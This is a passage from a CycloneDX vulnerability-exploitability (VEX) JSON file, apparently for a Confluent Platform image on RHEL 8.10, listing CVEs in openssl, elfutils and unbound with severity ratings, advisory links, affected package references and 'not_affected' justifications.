          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2024-25260",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "elfutils v0.189 was discovered to contain a NULL pointer dereference via the handle_verdef() function at readelf.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-25260"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-25260"
        },
        {
          "url": "https://github.com/schsiung/fuzzer_issues/issues/1"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25260"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=31058"
        },
        {
          "url": "https://sourceware.org/elfutils/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7369-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-25260"
        }
      ],
      "published": "2024-02-20T18:15:52+00:00",
      "updated": "2026-06-17T07:15:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.190-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.190-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.190-2.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/elfutils-default-yama-scope@0.190-2.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/elfutils-libelf@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/elfutils-libs@0.190-2.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2024-33655",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400
      ],
      "description": "The DNS protocol in RFC 1035 and updates allows remote attackers to cause a denial of service (resource consumption) by arranging for DNS queries to be accumulated for seconds, such that responses are later sent in a pulsing burst (which can be considered traffic amplification in some cases), aka the \"DNSBomb\" issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-33655"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18556"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:18931"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-33655"
        },
        {
          "url": "https://alas.aws.amazon.com/ALAS-2024-1934.html"
        },
        {
          "url": "https://bugzilla.redhat.com/2279942"
        },
        {
          "url": "https://bugzilla.redhat.com/2405706"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279942"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2405706"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33655"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11411"
        },
        {
          "url": "https://datatracker.ietf.org/doc/html/rfc1035"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-18556.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:18931"
        },
        {
          "url": "https://github.com/NLnetLabs/unbound/commit/c3206f4568f60c486be6d165b1f2b5b254fea3de"
        },
        {
          "url": "https://github.com/TechnitiumSoftware/DnsServer/blob/master/CHANGELOG.md#version-120"
        },
        {
          "url": "https://gitlab.isc.org/isc-projects/bind9/-/issues/4398"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-33655.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-18931.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00019.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3TBXPRJ2Q235YUZKYDRWOSYNDFBJQWJ3/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QITY2QBX2OCBTZIXD2A5ES62STFIA4AL/"
        },
        {
          "url": "https://meterpreter.org/researchers-uncover-dnsbomb-a-new-pdos-attack-exploiting-legitimate-dns-features/"
        },
        {
          "url": "https://nlnetlabs.nl/downloads/unbound/CVE-2024-33655.txt"
        },
        {
          "url": "https://nlnetlabs.nl/projects/unbound/security-advisories/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-33655"
        },
        {
          "url": "https://sp2024.ieee-security.org/accepted-papers.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6791-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-33655"
        },
        {
          "url": "https://www.isc.org/blogs/2024-dnsbomb/"
        },
        {
          "url": "https://www.nlnetlabs.nl/news/2024/May/08/unbound-1.20.0-released/"
        }
      ],
      "published": "2024-06-06T17:15:51+00:00",
      "updated": "2026-06-17T07:32:10+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.16.2-5.12.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/unbound-libs@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-unbound@1.16.2-5.12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
